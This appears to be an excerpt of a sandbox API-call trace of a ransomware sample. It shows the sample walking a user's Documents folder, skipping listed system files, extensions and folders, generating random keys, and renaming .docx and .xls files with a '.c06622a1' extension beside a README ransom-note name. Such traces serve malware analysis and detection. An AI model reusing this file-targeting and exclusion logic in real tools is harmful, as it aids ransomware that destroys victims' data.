_Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" [0158.839] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc") returned 0x39 [0158.839] wcscpy (in: _Dest=0x32400d4, _Source="vUMtlYMl.docx" | out: _Dest="vUMtlYMl.docx") returned="vUMtlYMl.docx" [0158.839] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\vUMtlYMl.docx", dwFileAttributes=0x80) returned 1 [0158.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\vUMtlYMl.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\vumtlyml.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0158.840] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.840] ReadFile (in: hFile=0x1c0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0158.841] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x35028309 [0158.841] RtlComputeCrc32 (PartialCrc=0x8309, Buffer=0x32e9a4, Length=0x80) returned 0xdc2e4b32 [0158.841] RtlComputeCrc32 (PartialCrc=0x4b32, Buffer=0x32e9a4, Length=0x80) returned 0x21dab52c [0158.841] RtlComputeCrc32 (PartialCrc=0xb52c, Buffer=0x32e9a4, Length=0x80) returned 0xf29c1fd [0158.841] RtlComputeCrc32 (PartialCrc=0xc1fd, Buffer=0x32e9a4, Length=0x80) returned 0xaf502cdb [0158.841] CloseHandle (hObject=0x1c0) returned 1 [0158.841] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0158.841] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\vUMtlYMl.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\vUMtlYMl.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\vUMtlYMl.docx" [0158.841] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\vUMtlYMl.docx") returned 0x47 [0158.841] wcscpy (in: _Dest=0x32500f6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.841] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\vUMtlYMl.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\vumtlyml.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\vUMtlYMl.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\vumtlyml.docx.c06622a1"), dwFlags=0x8) returned 1 [0158.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\vUMtlYMl.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\vumtlyml.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c0 [0158.844] CreateIoCompletionPort (FileHandle=0x1c0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0158.844] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x37e0020 [0158.852] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x352bba47 [0158.852] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x22afd526 [0158.852] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xe4e6711 [0158.852] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x39766329 [0158.852] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3b1a48e1 [0158.852] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1bb42f17 [0158.852] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6763a7f6 [0158.852] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xa749359 [0158.855] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x37e0094, Length=0x80) returned 0xecf4e2be [0158.856] RtlComputeCrc32 (PartialCrc=0xe2be, Buffer=0x37e0094, Length=0x80) returned 0xb09df3e [0158.856] RtlComputeCrc32 (PartialCrc=0xdf3e, Buffer=0x37e0094, Length=0x80) returned 0x9d214b95 [0158.856] RtlComputeCrc32 (PartialCrc=0x4b95, Buffer=0x37e0094, Length=0x80) returned 0x581020ee [0158.856] RtlComputeCrc32 (PartialCrc=0x20ee, Buffer=0x37e0094, Length=0x80) returned 0xe36bc45a [0158.856] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0158.856] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0158.856] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0158.857] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e557950, ftCreationTime.dwHighDateTime=0x1d5e45f, ftLastAccessTime.dwLowDateTime=0x8a377d80, ftLastAccessTime.dwHighDateTime=0x1d5df39, ftLastWriteTime.dwLowDateTime=0x8a377d80, ftLastWriteTime.dwHighDateTime=0x1d5df39, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="zxCybo3FW0ulKyY.xls", cAlternateFileName="ZXCYBO~1.XLS")) returned 1 [0158.857] _wcsicmp (_Str1="zxCybo3FW0ulKyY.xls", _Str2="README.c06622a1.TXT") returned 8 [0158.857] wcsstr (_Str="zxCybo3FW0ulKyY.xls", _SubStr="README") returned 0x0 [0158.857] _wcsicmp (_Str1="autorun.inf", _Str2="zxCybo3FW0ulKyY.xls") returned -25 [0158.857] wcslen (_String="autorun.inf") returned 0xb [0158.857] _wcsicmp (_Str1="boot.ini", _Str2="zxCybo3FW0ulKyY.xls") returned -24 [0158.857] wcslen (_String="boot.ini") returned 0x8 [0158.857] _wcsicmp (_Str1="bootfont.bin", _Str2="zxCybo3FW0ulKyY.xls") returned -24 [0158.857] wcslen (_String="bootfont.bin") returned 0xc [0158.858] _wcsicmp (_Str1="bootsect.bak", _Str2="zxCybo3FW0ulKyY.xls") returned -24 [0158.858] wcslen (_String="bootsect.bak") returned 0xc [0158.858] _wcsicmp (_Str1="desktop.ini", _Str2="zxCybo3FW0ulKyY.xls") returned -22 [0158.858] wcslen (_String="desktop.ini") returned 0xb [0158.858] _wcsicmp (_Str1="iconcache.db", _Str2="zxCybo3FW0ulKyY.xls") returned -17 [0158.858] wcslen (_String="iconcache.db") returned 0xc [0158.858] _wcsicmp (_Str1="ntldr", _Str2="zxCybo3FW0ulKyY.xls") returned -12 [0158.858] wcslen (_String="ntldr") returned 0x5 [0158.858] _wcsicmp (_Str1="ntuser.dat", _Str2="zxCybo3FW0ulKyY.xls") returned -12 [0158.858] wcslen (_String="ntuser.dat") returned 0xa [0158.858] _wcsicmp (_Str1="ntuser.dat.log", _Str2="zxCybo3FW0ulKyY.xls") returned -12 [0158.858] wcslen (_String="ntuser.dat.log") returned 0xe [0158.858] _wcsicmp (_Str1="ntuser.ini", _Str2="zxCybo3FW0ulKyY.xls") returned -12 [0158.858] wcslen (_String="ntuser.ini") returned 0xa [0158.858] _wcsicmp (_Str1="thumbs.db", _Str2="zxCybo3FW0ulKyY.xls") returned -6 [0158.858] wcslen (_String="thumbs.db") returned 0x9 [0158.858] _wcsicmp (_Str1="386", _Str2="xls") returned -69 [0158.858] wcslen (_String="386") returned 0x3 [0158.858] _wcsicmp (_Str1="adv", _Str2="xls") returned -23 [0158.858] wcslen (_String="adv") returned 0x3 [0158.858] _wcsicmp (_Str1="ani", _Str2="xls") returned -23 [0158.858] wcslen (_String="ani") returned 0x3 [0158.859] _wcsicmp (_Str1="bat", _Str2="xls") returned -22 [0158.859] wcslen (_String="bat") returned 0x3 [0158.859] _wcsicmp (_Str1="bin", _Str2="xls") returned -22 [0158.859] wcslen (_String="bin") returned 0x3 [0158.859] _wcsicmp (_Str1="cab", _Str2="xls") returned -21 [0158.859] wcslen (_String="cab") returned 0x3 [0158.859] _wcsicmp (_Str1="cmd", _Str2="xls") returned -21 [0158.859] wcslen (_String="cmd") returned 0x3 [0158.859] _wcsicmp (_Str1="com", _Str2="xls") returned -21 [0158.859] wcslen (_String="com") returned 0x3 [0158.859] _wcsicmp (_Str1="cpl", _Str2="xls") returned -21 [0158.859] wcslen (_String="cpl") returned 0x3 [0158.859] _wcsicmp (_Str1="cur", _Str2="xls") returned -21 [0158.859] wcslen (_String="cur") returned 0x3 [0158.859] _wcsicmp (_Str1="deskthemepack", _Str2="xls") returned -20 [0158.859] wcslen (_String="deskthemepack") returned 0xd [0158.859] _wcsicmp (_Str1="diagcab", _Str2="xls") returned -20 [0158.859] wcslen (_String="diagcab") returned 0x7 [0158.859] _wcsicmp (_Str1="diagcfg", _Str2="xls") returned -20 [0158.859] wcslen (_String="diagcfg") returned 0x7 [0158.859] _wcsicmp (_Str1="diagpkg", _Str2="xls") returned -20 [0158.859] wcslen (_String="diagpkg") returned 0x7 [0158.859] _wcsicmp (_Str1="dll", _Str2="xls") returned -20 [0158.860] wcslen (_String="dll") returned 0x3 [0158.860] _wcsicmp (_Str1="drv", _Str2="xls") returned -20 [0158.860] wcslen (_String="drv") returned 0x3 [0158.860] _wcsicmp (_Str1="exe", _Str2="xls") returned -19 [0158.860] wcslen (_String="exe") returned 0x3 [0158.860] _wcsicmp (_Str1="hlp", _Str2="xls") returned -16 [0158.860] wcslen (_String="hlp") returned 0x3 [0158.860] _wcsicmp (_Str1="icl", _Str2="xls") returned -15 [0158.860] wcslen (_String="icl") returned 0x3 [0158.860] _wcsicmp (_Str1="icns", _Str2="xls") returned -15 [0158.860] wcslen (_String="icns") returned 0x4 [0158.860] _wcsicmp (_Str1="ico", _Str2="xls") returned -15 [0158.860] wcslen (_String="ico") returned 0x3 [0158.860] _wcsicmp (_Str1="ics", _Str2="xls") returned -15 [0158.860] wcslen (_String="ics") returned 0x3 [0158.860] _wcsicmp (_Str1="idx", _Str2="xls") returned -15 [0158.860] wcslen (_String="idx") returned 0x3 [0158.860] _wcsicmp (_Str1="ldf", _Str2="xls") returned -12 [0158.860] wcslen (_String="ldf") returned 0x3 [0158.860] _wcsicmp (_Str1="lnk", _Str2="xls") returned -12 [0158.860] wcslen (_String="lnk") returned 0x3 [0158.860] _wcsicmp (_Str1="mod", _Str2="xls") returned -11 [0158.860] wcslen (_String="mod") returned 0x3 [0158.861] _wcsicmp (_Str1="mpa", _Str2="xls") returned -11 [0158.861] wcslen (_String="mpa") returned 0x3 [0158.861] _wcsicmp (_Str1="msc", _Str2="xls") returned -11 [0158.861] wcslen (_String="msc") returned 0x3 [0158.861] _wcsicmp (_Str1="msp", _Str2="xls") returned -11 [0158.861] wcslen (_String="msp") returned 0x3 [0158.861] _wcsicmp (_Str1="msstyles", _Str2="xls") returned -11 [0158.861] wcslen (_String="msstyles") returned 0x8 [0158.861] _wcsicmp (_Str1="msu", _Str2="xls") returned -11 [0158.861] wcslen (_String="msu") returned 0x3 [0158.861] _wcsicmp (_Str1="nls", _Str2="xls") returned -10 [0158.861] wcslen (_String="nls") returned 0x3 [0158.861] _wcsicmp (_Str1="nomedia", _Str2="xls") returned -10 [0158.861] wcslen (_String="nomedia") returned 0x7 [0158.861] _wcsicmp (_Str1="ocx", _Str2="xls") returned -9 [0158.861] wcslen (_String="ocx") returned 0x3 [0158.861] _wcsicmp (_Str1="prf", _Str2="xls") returned -8 [0158.861] wcslen (_String="prf") returned 0x3 [0158.861] _wcsicmp (_Str1="ps1", _Str2="xls") returned -8 [0158.861] wcslen (_String="ps1") returned 0x3 [0158.861] _wcsicmp (_Str1="rom", _Str2="xls") returned -6 [0158.861] wcslen (_String="rom") returned 0x3 [0158.861] _wcsicmp (_Str1="rtp", _Str2="xls") returned -6 [0158.862] wcslen (_String="rtp") returned 0x3 [0158.862] _wcsicmp (_Str1="scr", _Str2="xls") returned -5 [0158.862] wcslen (_String="scr") returned 0x3 [0158.862] _wcsicmp (_Str1="shs", _Str2="xls") returned -5 [0158.862] wcslen (_String="shs") returned 0x3 [0158.862] _wcsicmp (_Str1="spl", _Str2="xls") returned -5 [0158.862] wcslen (_String="spl") returned 0x3 [0158.862] _wcsicmp (_Str1="sys", _Str2="xls") returned -5 [0158.862] wcslen (_String="sys") returned 0x3 [0158.862] _wcsicmp (_Str1="theme", _Str2="xls") returned -4 [0158.862] wcslen (_String="theme") returned 0x5 [0158.862] _wcsicmp (_Str1="themepack", _Str2="xls") returned -4 [0158.862] wcslen (_String="themepack") returned 0x9 [0158.862] _wcsicmp (_Str1="wpx", _Str2="xls") returned -1 [0158.862] wcslen (_String="wpx") returned 0x3 [0158.862] _wcsicmp (_Str1="lock", _Str2="xls") returned -12 [0158.862] wcslen (_String="lock") returned 0x4 [0158.862] _wcsicmp (_Str1="key", _Str2="xls") returned -13 [0158.862] wcslen (_String="key") returned 0x3 [0158.862] _wcsicmp (_Str1="hta", _Str2="xls") returned -16 [0158.862] wcslen (_String="hta") returned 0x3 [0158.862] _wcsicmp (_Str1="msi", _Str2="xls") returned -11 [0158.862] wcslen (_String="msi") returned 0x3 [0158.862] _wcsicmp (_Str1="pdb", _Str2="xls") returned -8 [0158.863] wcslen (_String="pdb") returned 0x3 [0158.863] _wcsicmp (_Str1="sqlite", _Str2="xls") returned -5 [0158.863] wcslen (_String="sqlite") returned 0x6 [0158.863] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc")) returned 0x10 [0158.863] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0158.863] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" [0158.863] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc") returned 0x39 [0158.863] wcscpy (in: _Dest=0x32400d4, _Source="zxCybo3FW0ulKyY.xls" | out: _Dest="zxCybo3FW0ulKyY.xls") returned="zxCybo3FW0ulKyY.xls" [0158.863] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\zxCybo3FW0ulKyY.xls", dwFileAttributes=0x80) returned 1 [0158.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\zxCybo3FW0ulKyY.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\zxcybo3fw0ulkyy.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0158.864] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.864] ReadFile (in: hFile=0x194, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0158.864] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xdbefef22 [0158.865] RtlComputeCrc32 (PartialCrc=0xef22, Buffer=0x32e9a4, Length=0x80) returned 0x1d47eb57 [0158.865] RtlComputeCrc32 (PartialCrc=0xeb57, Buffer=0x32e9a4, Length=0x80) returned 0xc6eaf934 [0158.865] RtlComputeCrc32 (PartialCrc=0xf934, Buffer=0x32e9a4, Length=0x80) returned 0xd9b868 [0158.865] RtlComputeCrc32 (PartialCrc=0xb868, Buffer=0x32e9a4, Length=0x80) returned 0xff530a40 [0158.865] CloseHandle (hObject=0x194) returned 1 [0158.865] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0158.865] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\zxCybo3FW0ulKyY.xls" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\zxCybo3FW0ulKyY.xls") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\zxCybo3FW0ulKyY.xls" [0158.865] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\zxCybo3FW0ulKyY.xls") returned 0x4d [0158.865] wcscpy (in: _Dest=0x3250102, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.865] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\zxCybo3FW0ulKyY.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\zxcybo3fw0ulkyy.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\zxCybo3FW0ulKyY.xls.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\zxcybo3fw0ulkyy.xls.c06622a1"), dwFlags=0x8) returned 1 [0158.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\zxCybo3FW0ulKyY.xls.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\zxcybo3fw0ulkyy.xls.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x194 [0158.868] CreateIoCompletionPort (FileHandle=0x194, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.868] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3900020 [0158.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5852b2b7 [0158.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x780528e3 [0158.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x541a8e27 [0158.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6687c477 [0158.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x14d70bd1 [0158.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1829c006 [0158.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5b1713b2 [0158.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5537d5a1 [0158.880] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3900094, Length=0x80) returned 0xb151924e [0158.881] RtlComputeCrc32 (PartialCrc=0x924e, Buffer=0x3900094, Length=0x80) returned 0xb2193d38 [0158.881] RtlComputeCrc32 (PartialCrc=0x3d38, Buffer=0x3900094, Length=0x80) returned 0x6a550689 [0158.881] RtlComputeCrc32 (PartialCrc=0x689, Buffer=0x3900094, Length=0x80) returned 0x734523ad [0158.881] RtlComputeCrc32 (PartialCrc=0x23ad, Buffer=0x3900094, Length=0x80) returned 0xa9e02b79 [0158.881] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0158.881] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0158.881] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0158.881] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.881] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0158.881] _wcsicmp (_Str1="backup", _Str2="_6F2UOdqzk-Uc") returned 3 [0158.881] wcslen (_String="backup") returned 0x6 [0158.881] _wcsicmp (_Str1="bak", _Str2="_6F2UOdqzk-Uc") returned 3 [0158.881] wcslen (_String="bak") returned 0x3 [0158.882] _wcsicmp (_Str1="back", _Str2="_6F2UOdqzk-Uc") returned 3 [0158.882] wcslen (_String="back") returned 0x4 [0158.882] _wcsicmp (_Str1="archive", _Str2="_6F2UOdqzk-Uc") returned 2 [0158.882] wcslen (_String="archive") returned 0x7 [0158.882] _wcsicmp (_Str1="bckp", _Str2="_6F2UOdqzk-Uc") returned 3 [0158.882] wcslen (_String="bckp") returned 0x4 [0158.882] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0158.883] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0158.884] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.885] FindClose (in: hFindFile=0x154148 | out: hFindFile=0x154148) returned 1 [0158.886] _wcsicmp (_Str1="backup", _Str2="Documents") returned -2 [0158.886] wcslen (_String="backup") returned 0x6 [0158.886] _wcsicmp (_Str1="bak", _Str2="Documents") returned -2 [0158.887] wcslen (_String="bak") returned 0x3 [0158.887] _wcsicmp (_Str1="back", _Str2="Documents") returned -2 [0158.887] wcslen (_String="back") returned 0x4 [0158.887] _wcsicmp (_Str1="archive", _Str2="Documents") returned -3 [0158.887] wcslen (_String="archive") returned 0x7 [0158.887] _wcsicmp (_Str1="bckp", _Str2="Documents") returned -2 [0158.887] wcslen (_String="bckp") returned 0x4 [0158.887] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0158.887] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0158.887] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0158.887] _wcsicmp (_Str1="$recycle.bin", _Str2="Downloads") returned -64 [0158.887] wcslen (_String="$recycle.bin") returned 0xc [0158.887] _wcsicmp (_Str1="config.msi", _Str2="Downloads") returned -1 [0158.887] wcslen (_String="config.msi") returned 0xa [0158.888] _wcsicmp (_Str1="$windows.~bt", _Str2="Downloads") returned -64 [0158.888] wcslen (_String="$windows.~bt") returned 0xc [0158.888] _wcsicmp (_Str1="$windows.~ws", _Str2="Downloads") returned -64 [0158.888] wcslen (_String="$windows.~ws") returned 0xc [0158.888] _wcsicmp (_Str1="windows", _Str2="Downloads") returned 19 [0158.888] wcslen (_String="windows") returned 0x7 [0158.888] _wcsicmp (_Str1="appdata", _Str2="Downloads") returned -3 [0158.888] wcslen (_String="appdata") returned 0x7 [0158.888] _wcsicmp (_Str1="application data", _Str2="Downloads") returned -3 [0158.888] wcslen (_String="application data") returned 0x10 [0158.888] _wcsicmp (_Str1="boot", _Str2="Downloads") returned -2 [0158.888] wcslen (_String="boot") returned 0x4 [0158.888] _wcsicmp (_Str1="google", _Str2="Downloads") returned 3 [0158.888] wcslen (_String="google") returned 0x6 [0158.888] _wcsicmp (_Str1="mozilla", _Str2="Downloads") returned 9 [0158.888] wcslen (_String="mozilla") returned 0x7 [0158.888] _wcsicmp (_Str1="program files", _Str2="Downloads") returned 12 [0158.888] wcslen (_String="program files") returned 0xd [0158.888] _wcsicmp (_Str1="program files (x86)", _Str2="Downloads") returned 12 [0158.888] wcslen (_String="program files (x86)") returned 0x13 [0158.888] _wcsicmp (_Str1="programdata", _Str2="Downloads") returned 12 [0158.888] wcslen (_String="programdata") returned 0xb [0158.889] _wcsicmp (_Str1="system volume information", _Str2="Downloads") returned 15 [0158.889] wcslen (_String="system volume information") returned 0x19 [0158.889] _wcsicmp (_Str1="tor browser", _Str2="Downloads") returned 16 [0158.889] wcslen (_String="tor browser") returned 0xb [0158.889] _wcsicmp (_Str1="windows.old", _Str2="Downloads") returned 19 [0158.889] wcslen (_String="windows.old") returned 0xb [0158.889] _wcsicmp (_Str1="intel", _Str2="Downloads") returned 5 [0158.889] wcslen (_String="intel") returned 0x5 [0158.889] _wcsicmp (_Str1="msocache", _Str2="Downloads") returned 9 [0158.889] wcslen (_String="msocache") returned 0x8 [0158.889] _wcsicmp (_Str1="perflogs", _Str2="Downloads") returned 12 [0158.889] wcslen (_String="perflogs") returned 0x8 [0158.889] _wcsicmp (_Str1="x64dbg", _Str2="Downloads") returned 20 [0158.889] wcslen (_String="x64dbg") returned 0x6 [0158.889] _wcsicmp (_Str1="public", _Str2="Downloads") returned 12 [0158.889] wcslen (_String="public") returned 0x6 [0158.889] _wcsicmp (_Str1="all users", _Str2="Downloads") returned -3 [0158.889] wcslen (_String="all users") returned 0x9 [0158.889] _wcsicmp (_Str1="default", _Str2="Downloads") returned -10 [0158.889] wcslen (_String="default") returned 0x7 [0158.889] wcscpy (in: _Dest=0x1d1000, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0158.890] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0158.890] wcscpy (in: _Dest=0x1d1044, _Source="Downloads" | out: _Dest="Downloads") returned="Downloads" [0158.890] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 